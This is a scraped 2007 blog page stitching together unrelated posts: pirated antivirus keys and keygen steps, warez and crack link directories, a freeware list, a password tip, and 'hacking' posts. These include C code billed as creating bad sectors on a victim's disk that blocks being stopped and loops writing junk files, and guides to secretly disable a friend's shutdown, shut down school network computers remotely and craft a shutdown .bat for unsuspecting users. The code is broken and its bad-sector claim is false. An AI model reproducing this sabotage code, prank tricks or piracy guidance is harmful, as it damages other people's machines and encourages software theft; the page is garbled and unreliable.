Wednesday, October 17, 2007



mc affee latest


NORTON with 10 years subscription


Blocks viruses and spyware with advanced protection

Antivirus, Antispyware, Internet Worm Protection, Rootkit Detection

Detects and removes viruses and spyware

Blocks spyware automatically

Prevents virus-infected emails from spreading

Eligible for a free Windows Vista compatibility update

Includes protection updates and new product features as available throughout the
renewable service period*

Norton Ongoing Protection keeps your computer protected against the latest internet
threats and includes Automatic Renewal which automatically renews your subscription
at the regular renewal subscription fee so you dontt have to worry.


STEP 1 :
(Create your keygen open-don't close it):

STEP 2 :

STEP 3 :

STEP 4 :

STEP 5 :


http://www.megauplo 5S0CDMUT
http://www.megauplo LLGJICIG

click here
AVG Internet Security

Its not just only Anti Virus System but its a complete protection of your PC..Much Much better than any other Anti Virus..

Tested and Workin..


AVG Internet Security Key

Complete security protection against all of the most serious Internet threats, including viruses, worms, trojans, spyware, adware, hackers and spam. Compatible with Windows Vista!


a.. Anti-Virus protects from viruses, worms and trojans
b.. Anti-Spyware protects from spyware, adware and other malicious programs
c.. Anti-Spam filters spam and protects against phishing attacks
d.. Firewall protects from hackers
a.. All-in-one, easy to use protection - install and forget
b.. New program versions and updates, for free, throughout the license duration
c.. Quality proven by all major antivirus certifications (VB100%, ICSA, West Coast Labs Checkmark)
d.. 24/7 technical support provided at no extra cost
e.. Improved virus detection based on better heuristics and NTFS data streams scanning
f.. Unique automatic threat-removal anti-spyware engine
g.. Automatic firewall profile switching for improved security and usability

Vista Transformation Pack 7.0 with Key

Vista Transformation Pack 7.0 with Key
[image: Vista Transformation Pack - 7 **NEW**]

This is the most tired release I've ever been through. I wonder if user who
get this will appreciate how hard I really went through for this. It seems
Lee is being too messy right now so I won't hold back any longer. This
release has overall improvements for features compared to previous versions
and has a lot of user interface refinements for ease of use with end-user.
You will find this program is amazingly easier comparing to all other shell
packs. Let's see the changelog of this release.

*Changes in Version 7.0*

-Added default system font option for recovery
-Added Docking support for preview and taskbar replacement
-Added DPI auto-detection in Machine Configuration
-Added hiding menubar option for Vista (Styler) toolbar
-Added information about KB925902 hotfix issues and solution on startup
-Added memory requirements checking for 3rd-party applications
-Added resetting DPI options and some extra information in Machine
-Added screen resolution auto-detection
-Added setting cleartype font automatically after the transformation
-Added Vista transformation "Express mode" (Make an appropriate setup
configuration in single page!)
-Added ViStart (Vista Start Menu port for Windows XP/2003 with glass UI and
search function)
-Added uninstalling existing components before updating
-Added WindowBlinds detection warning message (for user who is mistaken
about glass border skin)
-Added Windows Server 2003 Service Pack 2 uxtheme patching support
-Fixed backing up system files bug on repair mode
-Fixed checking for Styler incompatibility with x64 edition OS
-Fixed fileversion checking bug that cause backup
being overwritten by modified system files when update
-Fixed operating system checking bug (that allow user to install in Windows
2000 and below)
-Fixed Start Orb positioning bug
-Fixed Styler to execute Styler.exe only when user wants to hide menu bar to
save up memory and some weird issues
-Fixed Styler to run in toolbar mode (prevent error and message popup)
-Fixed Vista (Styler) toolbar option with correction of menubar
-Fixed uninstalling bug with system drive icon
-Fixed uninstalling routines
-Fixed uxtheme.dll patching detection bugs on machine without any service
-Fixed Windows Live Messenger skin uninstallation bug
-Moved extra dialogs in the main dialogs process so user can make all
decisions before transforming
-Removed customized open/save dialog due to bugs in some applications
-Replaced closeapp with pskill (some programs reported closeapp as
it isn't)
-Replaced Blaero's Start Orb with ViOrb (Auto positioning and snap over the
start button upon taskbar shifting)
-Updated battery tray icons
-Updated Getting Started and Help and Support FAQ
-Updated LClock x86 to version 1.62b
-Updated Maintenance Center to be Welcome Center
-Updated minor UI graphic resources in themes
-Updated Segoe UI font
-Updated Shutdown/Logoff dialogs
-Updated Start Orb to full circle version
-Updated Thoosje's Vista sidebar to version 2.1
-Updated transformation to use backup system file if it has the same
fileversion during update
-Updated updating function to uninstall previous components before updating
-Updated Vista logon screen (Thanks to SoFtEcH for updating my logon)
|-Added status message (Welcome, Shutdown, etc.)
|-Fixed user account disapperance bug on lower resolution
|-Fixed user account moving around when focused
|-Moved shutdown button to right part
|-Updated password panel resources
|-Updated userpicture's frame border
-Updated Visualtooltip to version 2.1

*Download link for VTP 7*

*Download link for WinBlinds*


Windows Essentials Bundle

Completely up-to-date with Windows Updates (May 5th, 2007)
No CD-Key Required
No Activation Required
Passes WGA every time which means you can download anything directly from Microsoft's website


All languages except English
Windows Messenger
Windows Tour


.NET Framework Versions 1.1 & 2 With All of Their Updates
Mircrosoft Visual C++ Runtimes
Microsoft Visual J#
Enhanced Control Panel
K-Lite Mega Codec Pack v2.01
DirectX v9.1.3
Flash Player v9.0.28
Windows Media Player 11
Internet Explorer 7
Firefox v2.0.3
ThumbView Lite 1.0 (Let's you view thumbnails of odd types of images, such as PSD's)
WinRar v3.7
Foxit v2.2 (For viewing PDF's)
UnDelete Plus v2.8 (Recover Lost Files)
Vista Drive Indicator (Adds a Meter to HDD Icons That Shows How Much Space is Free)
Numerous Tweaks to Registry to Enhance Usability
Multiple Context-Menu Additions (Right-Click Menu)

Freeware Utilities

Freeware Utilities
The 46 Best-ever Freeware UtilitiesThe Best-ever Freeware List
Free Web Browser Direct Links

=>index [1] (5.6MB)
[3] (4.6MB)
[4] (1.9MB)
[5] (1.86MB)
[6] (6MB) 2 Best Free Anti-Virus Software
There are two equal recommendations in this category. First there is AVG Antivirus 7 Free Edition. This product [1] has been continuously refined since it was first released in 1991 and the recently released V7.5 makes further improvements to an already solid product. Additionally, it's relatively small, light on resources, has regular automatic updates and handles email scanning. There is a free and a pro version, the only difference being that the free version has a few non-critical features disabled and has no direct technical support. Equally effective is the free Avast! scanner [2] though its funky media player style interface is not to everyone's taste. Avast! also required periodic re-registration while AVG does not. However Avast! does not seem to suffer the signature file update problems that plague some AVG users. A possible third choice is the AOL Anti Virus Shield [3]. This is a cut down version of the top rated Kaspersky AV and is being made available for free to all uses not just AOL members. On first sight it seems like an unbeatable deal but it's not quite what it seems. First this really is a "lite" version. It lacks the important html and heuristics modules present in the full Kaspersky product so the protection afforded against hostile web sites is actually inferior to AVG and Avast!. Gone, too, is the ability to create rescue disks and to fully manage the quarantine area. The configuration options are also more limited. Secondly the End User License Agreement is worrying. AOL basically reserves the right to spam you. I'm not aware of this actually happening but you need to be aware they have the right to do so. By default AOL AVS installs the AOL search bar in Internet Explorer as part of the AVS install. If you don't want it, make sure you opt out during installation. So on balance I'm cautious about recommending AOL AVS. If you can however, live with the limitations then you'll be rewarded with a first class scanner. Both AVG and Avast! are excellent free products that will meet the needs of most users. However neither can be considered to be the best available. That title belongs to commercial products like NOD32, F-Secure, the full version of Kaspersky AV and others. They are however capable packages and offers the financially challenged a real alternative to the major anti-virus suites. However if you use these free products in conjunction with a free on-demand scanner, you can achieve a level of detection approaching that of the best commercial products. Further improvement is possible by creating a layered defense using additional free security products such as AVG Anti-Spyware (formerly Ewido). On-demand scans should be run regularly, at least weekly, to check for viruses and other malware that may have been missed by your main scanner. If you don't use AOL AVS as your main AV product then this should be your the top choice as an on-demand scanner as its detection is outstanding. You should though, disable the AOL AVS real time monitor otherwise you may run into conflicts with the monitor on your primary AV product. Another top recommendation for an on-demand scanner is AntiVir Personal Edition Classic [4]. It offers significantly better detection rates than either AVG or Avast! but the lack of email scanning precludes recommendation as a primary scanner. However as an on-demand scanner, it's first rate. If you use it in this role, make sure you disable its resident virus guard during installation to prevent it interfering with your main AV scanner.Even so , it's quite an intrusive product -you will certainly be well aware of its presence. Note that the recently released V7 unfortunately introduces a time limited license though apparently this will be renewable. Yet another good option for on-demand scanning is the free version of the commercial AV product BitDefender [5]. It's a first class product with outstanding detection rates but as the free version lacks an email scanner and a resident virus guard, it's only really suited for use as an on-demand scanner rather than your main AV product. There are some other limitations as well. First it has an annoying habit of detecting malware products that have been quarantined by other security products and you can't exclude these areas from subsequent scans. Secondly, it is only available on a one year non-renewable license.
[1] (16.0MB)
[2] (8.8MB)
[3] (13.9MB)
[4] (8.7MB)
[5] (13.2MB) 3 Best Free Adware/Spyware/Scumware Remover

[1] ( 6.4MB)
[2] (2.3MB)
4 Best Free Browser Protection Utility

1] Free for personal use, Win2K and later, 310KB
[2] Freeware, all Windows version, 2.5MB
[3] Freeware, All Windows versions, 913KB

5 Best Free Firewall

[1] (7.3MB)
[2] (8MB)
[3][ (2.7MB)
[4] (6.3MB)
[5] (9.0MB)

6 Best Free Trojan Scanner/Trojan Remover

[1] (6.17MB)
[2] <= review of Ewido

7 Best Free Rootkit Scanner/Remover

[1] Free beta, Windows 2000 and later, 808KB
[2] Freeware, All Windows versions, 210KB
[4] Freeware, Windows NT and later, 450KB
[5] Freeware, Windows XP and later, 1.9MB
[6] Windows 2000 and later, 626KB
[7] <= How to deal with the threat of rootkits
8 Best Free Intrusion Prevention and Detection Utility for Home Use

[1] Freeware, Windows 2000 and later, 4.7MB[2]
[2] Free for personal use,Win2K and later 26.7MB
[3] $21.95, Win2K and later, 8.2MB
[4] $29, Win2K and later, 1MB

9 Best Free Anonymous Surfing Service

[1] Freeware, Any Windows system with Java, 107KB
[2] Free BSD License, All Windows, 4.6MB
[3] Freeware, Windows NT and later, 9.27MB

10 Best Free Software Suite


The Best Windows Backup Software
We are in the process of updating all the backup reviews at our site but I can tell you right now that the top product has blitzed the field for a second year in row. In fact, it's improved so much that it's now a one horse race for our "editor's choice." The updated review of the top product is now online. If you have been looking for a backup program, this is the one.

The Best Spyware Detector
If you use Ad-Aware or SpyBot you will be surprised just how more effectively SpySweeper detects and protects your PC from Adware, Spyware, Trojans and other malicious products. That's why it yet again won the prized "Editor's Choice" award from PC Magazine. Try the free evaluation copy and see for yourself, you may be surprised what it finds on your PC. The Best Remote Access Software
Our reviewer had given this product category away as "too slow, tool clumsy and too unreliable" but after reviewing this product he's changed his mind; "... at longlast a remote access solution that actually works! Quite frankly we agree with him, it's an impressive product. Read the full review here: The Best Spam Blocker for Dummies
Most spam filters require you to be a computer expert. Our Editor has found two spam filters for average users that will remove the spam from your email and yet are simple to use. The Best Anti-trojan Scanner
Most users are not aware that their anti-virus scanner can only provide a moderate level of protection against trojan programs that try and take control of your PC. To really protect your computer, you need a dedicated anti-trojan program. Our editor's have reviewedevery major product on the market and have concluded that two scanners stand head and shoulders above the other contenders. The Best Drive Imaging Program
In this race there are really only two runners worth considering. This review provides an in-depth comparison of the top contenders but in the end, one product is the clear winner. The Best Free Kids Craft Projects
Keep your children engaged and amused with healthy, creative arts and craft activities that won't cost you a cent. Free weekly newsletter packed with easy kids craft projects.

11 Best Free File Manager

[1] Free for private use, Win 95 and later, 899KB
[2] Free for private use, Win 98 and later, 623KB.
[3] All Windows versions, Free for private use, 633KB
[4] [5] Freeware, Windows 95 and later, 1.61MB

12 Best Free Email Client
[1] Free Open Source software, Win 98 and later, 6.0MB
[4] Freeware, Win 95 and later, 5.5MB. 13 Best Free Web Mail Accessory

[1] Free GPL license, Win95 and later, 1.48MB
[2] Freeware, Windows 98 and later, 813KB
[4] Free Open Source, 1.5MB
[5] <= Installing Mr Postman
[6] <= MrPostman forum
[7] Freeware, Windows 95 and later, 818KB
14 Best Free Clipboard Replacement Utility

[1] Windows 98 and later, 382 KB
[2] Windows 95 and later, 422KB
[3] .3MB

15 Best Free HTML Editor

[1] Free Open Source, Windows 98 and later plus Linux, 6.57MB
[3] Free, Windows 98 and later, 5.2MB
[4] Freeware, All Windows versions, 3.4MB

16 Best Free Spam Filter for the Average User

[1] ( 3.05MB)
[2] (1.57MB)
[3] (1.87MB)
[4]<=brief review of the best spam blockers

17 Best Free Spam Filter for Experienced Users (4.3MB) (3.6MB) (113KB)
18 Best Free Popup Stopper

[1] Freeware, All Windows versions, 1.38MB
19 Best Free Desktop Search Utility

[1] X1 Enterprise Client, Free for personal use, Windows XP, 12.9MB.
[2] Freeware, Windows 2000 SP3 or later, 5.3MB
[3] Freeware, Windows 2000 SP3 or later, 2MB
[4] Freeware, Windows 2000 or later, 8.7MB
[5] Freeware, Windows 98 and later. 3MB

20 Best Free Digital Image Viewer

[1] (874KB)
[2] (3.3MB)
[3] (3.0MB)
21 Best Free Digital Image Editor

[1] (7.7MB)
[2] (7.4MB)
[3] Freeware, Win2K and later, 3.6MB
[4] Freeware, all Windows, 19.4MB
[5] Free for personal use, Windows 98 and later, 1.6MB

22 Best Free Digital Photo Organizer

23 Best Free Text Editor

[1] Free for non-commercial use, Windows NT and later, 2.9MB
[2] Freeware, Windows 98 and later, 241KB
[3] Freeware, All Windows versions, 1.4MB
[4] Open Source Freeware, All Windows versions, 1.03MB
[5] Freeware, all Windows versions, 3.4MB
[6] Freeware, All Windows versions, 1.6MB
[7] Freeware, All Windows versions, 1.2MB

24 The Best File Archiver/Zip Utility Windows 9x and later, 3.1MB Windows 9x and later, 1.05MB

25 Best Free Hotkey Utility

[1] Freeware, all Windows versions, 1.75MB
[2] Freeware, all Windows versions, 707KB
[3] Freeware, Windows XP, 804KB
[4] Freeware, all Windows versions, 170KB
26 Best Free Registry Cleaner

[1] Freeware, All Windows versions, 2.8MB
[2], Windows 98 and later, 860KB.
[3] Free for non-commercial use, Windows 98 and later, 457KB
[4] Freeware, All Windows versions, 2.1MB
27 Best Free BitTorrent Client

[1] Open source, any PC that supports Java, 7.6MB
[2] Freeware, all Windows versions, 170KB
28 The Best Free FTP Client

[1] Free Open Source, Windows NT and later, 3.4MB
[2] Free for non commercial use, Windows 2000 and later 3.3MB
[3] Free GNU license, All Windows version, (1.4MB)
29 Best Free Bookmark Cleaner
30 Best Free Folder Synchronization Utility

[1] CCE41AF06EB7&displaylang=en (844KB)
[2] (1.9MB)
31 Best Free Screen Capture Utility

[1] (1.1MB)
[2] (381KB)
[3] (2.9MB)
32 Best Free Search Toolbar (3MB) (327KB) (447KB)
33 Best Free Download Manager

[1] Freeware, All Windows versions, 2.34MB
[2] Freeware, All Windows versions, 1.59MB
[4] Freeware, all Windows versions, 1.43MB
[5] Free for personal use, All Windows versions, 2.9MB
[6] Free Firefox extension, 425KB
34 Best Free Web Site Ripper Free GPL, All Windows versions, 3.3MB
35 Best Free Download/Upload Meter

[1] (601KB)
[2] (806KB)
36 Best Free TCP Settings Tweaker
37 Best Free File Cleaner
[1] Freeware, all Windows versions, 1.4MB
[2] Freeware, Windows 98 and later, 667KB
[3] Freeware, Windows version unstated, 331KB.
38 Best Free Resource Meter

[1] (92KB)
[2] (1.65MB)
39 Best Free Sticky Notes Utility

[1] (723KB)
[3] (550KB)
[4] (596KB)
40 Best Free Secure Erase Utility

[1] Free GNU license, all Windows versions, 2.4MB
[2] Freeware, Windows NT and later, 1.24MB
[3] Free Open Source, All Windows versions, 1.99MB

41 Best Free Registry Editor

1] Freeware, All Windows versions, 2.0MB.
42 Best Free Process Viewer

[1] Freeware, Windows 9x and later, 640KB.
[2] Free beta, Windows 2000 and later, 1.09MB
43 Best Free System Information Utility

[2] Freeware, all Windows versions, 2.9MB
[3] Freeware, all Windows versions, 4.0MB
[4] Free beta, Windows XP Pro with 512MB RAM on the administrator's PC, 7MB.
[5] Free for personal use, all Windows versions, 945KB
[6] Freeware, Win98 and later, 1.18MB
44 Best Free Search and Replace Utility

[1] Freeware, all Windows versions, 361KB
[2] Freeware, all Windows versions, 992KB
[3] Free for private use, 1.03MB
45 Best Free Outliner

[1] Free Mozilla Public license, Windows 98 and later, 1.7MB
[2] Free MIT X11 License, all Windows versions, 680KB
46 Best Free Rename Utility

[1] Freeware, all Windows versions, 734KB
[2] Freeware, all Windows versions, 648KB
[3] Freeware, Windows 98SE and later, 622KB
[4] Freeware, all Win versions, 2.9MB

free cracks n tutorials

ALL Free Things you'll ever need V Apache tutorial

Tutorials (All areas)



3D Studio Max

Stock photos


Htaccess Tutorial
Part 8:

Links Worth Checking Out

These sites contain Tons of Other Website Links - Bookmark 'em!


Consistently Updated Sites:


Clean Warez Links:


TOP crack Sites:


Direct crack DOWNLOADS For Popular Programs Only:


NEWEST Releases Of Apps + Fixes:




Peer 2 Peer:






Miscellaneous Sites:


Use the search engines to find cracks for particular programs.
Be sure the version is the correct one for the crack.
Use the metasearches and sites that offer searching a number of engines from the same page for easier searches.
A lot of these sites are supported by porn. Any notable feature of sites are indicated alongside.

Crack search engines: the BEST metasearch for cracks very good can search 23 engines from 1 page search the main engines from here
a good search site with minimal popups another good one porn pop ups too many pop ups

If the search engines dont give you the crack try various crack and serial sites. There are 1000s but the ones here are the ones you should try first.

Cracks and Serials:


Shareware sites to get the apps for the cracks:


The Russians leave most of their apps out in the open.
These sites also have quite a few apps.[/]

Russian app sites: - working - apps cracks music etc - forum - direct links


[i]Use these links to find particular files if you know the exact name.
You can find older versions of programs that may have been removed from sites and files on http://ftp..and/ lots more.

File Search Engines: - the best free file searcher left - good for anonymous ftps searching good if you know how to search FTP indexer is THE BEST searcher but is now paid Use this to find normally unindexed Estonian ftps - has a large but less quality index - another one - a


New french searcher:

These sites list links to ftps containing lots of software. The links don last very long as the files get deleted or the login info changes.

FTP Lists:
Large list but you have to search a bit to find working ones
Again you have to look around to find stuff that works but it is there.
I dont like this one much


This is a reasonable one.
Worth a visit if you use ftps.

FTP: ftp sharing forum


Games cheats/no-cds:


Useful: Get mirrors for your Flashget/Getright downloads new search engine with lots of options Best bet for finding pictures A good metasearcher Help to set up and dedug firewalls Registry help dll store Tools for programmers Find out what any extension means Obtain bootdisks for windows dos etc.

Sample mp3/wav files for music apps like E-Jay and Fruityloops


Graphics and Web: Dreamweaver Extensions


CD-Burning: Step by step help on all major burner apps CD writing help forum Tutorials on DVD ripping, audio cd ripping Download copy protections for your cds Daemon Toolshome. Use if you dont have a writer for isos


Burner apps download sites:


CD Covers:


DVD Ripping/Backup: A site that is dedicated to archiving DVD Backup those precious DVDs Quality standards for ripped movies Want to check what the new DivX you're downloading looks like Internet Movie Database geovisit();

hacking website

Hackers favourite websites

This thread needs ur contribution

lemme start / / mess up wid msn messenger // all file downloads // network checking site // windows First release ever installation video // convert file formats FREE

E Books Downloads



Make Ultra Strong Passwords

As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:

1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.

I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.

1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.

Microsoft has the following to say on the subject of ALT+NUM key codes:


Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:

• Alt+, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.

Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.

The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.

The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.

For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.

some examples :

ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬

Create Bad sectors on hard disks

A C source code

/*create bad sectors on the hard disk.
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.


#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */

void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */

Disable or remove shutdown

Disable or remove shutdown

=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherlearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r

Why do some E-mails Take so Long to Deliver

i have come to expect e-mails to take seconds to be delivered. We often regard e-mails as an instantaneous method of communication. Almost like a telephone call. We are very surprised if an e-mail takes over one hour to deliver. But did you know it can take days? This article gives the reasons for the speed of delivery and also the reasons why delivery can take days. Overview of E-Mail Delivery
Pressing the Send Button
After the e-mail has been written, composed and spell checked the send button is pressed. This causes the e-mail to be sent from the PC to a mail server known as a SMTP (Simple Mail Transfer Protocol) sever. This is usually operated by the ISP that you pay for your Internet connection or, if you are a business, the SMTP server than handles all outgoing mail. This rarely fails. If it fails it is usually because the SMTP server is down or the dial-up line is not connected.
Sender's SMTP Server Locates the Recipient's SMTP Server's IP Address
If the sender's domain name if different from the recipient's domain name the SMTP server cannot deliver the e-mail to the recipient. It needs to pass the message to an SMTP server that knows how to deliver the message. The sender's SMTP server tries to find the IP (Internet Protocol) address of the recipient's SMTP server. The Internet is a busy and congested place and this request could fail. The SMTP server does not give up at that point. It will try many times times before giving up. Most SMTP servers will try for five days before throwing in the towel! If you are lucky, some SMTP servers will inform the sender if the message cannot be sent within 24 hours, but still it will continue to try. Eventually, the SMTP will find the IP address of the recipient. Now it can try to pass the message on.
Sender's SMTP Server Passes Message to the Recipient's SMTP Server's
Now that the sender's SMTP Server knows the IP address (similar to a telephone number) of the recipient's SMTP server, it calls it and ask for permission to send the message. Most times this works but sometimes the recipient's SMTP server will reject the call. This can be for many reasons - such as the the server is too busy (especially when viruses are being propagated around the world). If it does fail, the sender's SMTP server will continue to try before giving up. Usually, the message will be sent to the recipient's SMTP server before the five days has passed. However, this is not the whole story. A recipient usually has 2 SMTP servers. Some organisation have many more - AOL has at least 4. If the main server is busy, the sender's SMTP server will also call any other of the recipient's servers.
Recipient's SMTP Server Passes Message to another SMTP Server
If the message was not passed to the recipient's SMTP server than can deliver the mail, the message will be passed to another SMTP server that may be closer to the recipient. Like the previous section, this could take seconds, minutes, hours or even days. This situation occurs a lot in business where the main receiving SMTP server is owned by a third party and checks all incoming e-mails for viruses and spam. If they pass the tests, the message is passed to the recipient's SMTP server.
Recipient's SMTP Server Places Message into Recipient's Mailbox
At last, the message has arrived at a SMTP server that knows where the recipient's mailbox is located. Once the message is in the mailbox it can be seen and viewed by the recipient. How Long Does it Take In over 95% of cases the above process takes less than a minute. Far quicker than it took to read the explanation. In a few cases the message could take as long as 5 days to complete its trip from sender to recipient. It rarely takes move than 5 days as one of the SMTP servers will send the message back as undeliverable. And yes, the e-mail that contains the error message could take 5 days to get back!

Abort Shutdown [Basics]

Hmm we all know the easiest way to shut down your computer is to type (shutdown –s) in to cmd “command” and that will give a message that the computer will shutdown and you have 30 seconds. But if u just type (shutdown -a) it will abort the shutdown but there are other commands. ill just start off doing the easiest 1

Shutdown –s
it will shutdown your computer in 30 seconds and display a message

shutdown –s –t 40
it will shutdown in 40 seconds but you can only go up to 86400 (24 hours) but if you make it 0 it will show no message and just shutdown

shutdown –s –c ”haha the computer is going to shutdown”
it will shutdown with a message in a box under the time

shutdown –l
it will just log you of the computer

shutdown -i
it will display the GUI shutdown window

shutdown –r
will restart the computer

shutdown –a
it will abort the shutdown

shutdown –f
will force all running applications to close

I m not much confident about how to use (shutdown –d) so I just grab this of the net

-d [u] [p]:xx:yy
The reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than 65536)

and now the fun stuff starts to begin if you still go to school or uney with the "-m" command

the –m command will let you shut down computers on the network and all you need is the ip address or the computer name (its found in the system info in the "computer name" tab)(right click on my computer and go to properties and you will see "computer name”)

once your have the ip or the computer name just type (shutdown –s –m \\”ip/computer name” in to cmd but you can use all the command with it but you carnet use “-l” over the network it doesn’t let u

and now to tern it in to a file so who ever opens it, it will make the computer shutdown just type what ever you want the computer to do in to a notepad file and save it as a .bat file(go to save as and (what ever name u want) and type .bat at the end)

Image Formatting tips

Image file formats

Image files are made up of picture elements, called PIXELS The pixels that comprise an image are in the form of a grid of columns and rows. Each of the pixels in an image stores digital numbers representing brightness and color.
Major graphic file formats

There are many graphic file formats, if we include the proprietary types. The PNG, JPEG, and GIF formats are most often used to display images on the Internet. These graphic formats are listed and brieflydescribed below, separated into the two main families of graphics: raster and vector.

Raster formats

The JPEG (Joint Photographic Experts Group) image files are a lossy format. The DOS filename extension is JPG, although other operating systems may use JPEG. Nearly all digital cameras have the option tosave images in JPEG format. The JPEG format supports 16-bit color and produces relatively small file sizes. Fortunately, the compression in most cases does not detract noticeably from the image. But JPEG files do suffer generational degradation when repeatedly edited and saved. Photographic images are best stored in a lossless non-JPEG format if they will be re-edited in future, or if the presence of small "artifacts" (blemishes), due to the nature of the JPEG compression algorithm, is unacceptable. JPEG is also used as the image compression algorithm in many Adobe PDF files.

The TIFF (Tagged Image File Format) is a flexible image format that normally uses a filename extension of TIFF or TIF. TIFF's flexibility is both a feature and a curse, with no single reader capable of handling all the different varieties of TIFF files. TIFF can be lossy or lossless. Some types of TIFF offer relatively good
